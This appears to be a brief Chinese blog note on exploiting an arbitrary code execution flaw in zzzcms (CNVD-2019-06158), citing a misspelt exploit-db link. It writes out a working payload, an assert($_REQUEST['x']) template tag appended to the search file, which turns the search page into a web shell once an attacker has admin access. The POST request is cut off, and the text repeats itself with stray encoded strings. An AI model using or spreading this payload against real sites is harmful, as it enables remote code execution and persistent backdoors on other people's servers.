【笔记】zzzcms任意代码执行漏洞利用
前言
zzzcms任意代码执行漏洞利用
CNVD-2019-06158
https://expolit-db.com/exploits/46454
漏洞利用前提
- 已经登录管理员后台
exp
在搜索文件末尾追加
{if:assert($_REQUEST['x'])}phpinfo();{end if}在搜索时传递参数
1 | POST /search/ |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
zzzcms任意代码执行漏洞利用
CNVD-2019-06158
https://expolit-db.com/exploits/46454
在搜索文件末尾追加{if:assert($_REQUEST['x'])}phpinfo();{end if}
在搜索时传递参数
1 | POST /search/ |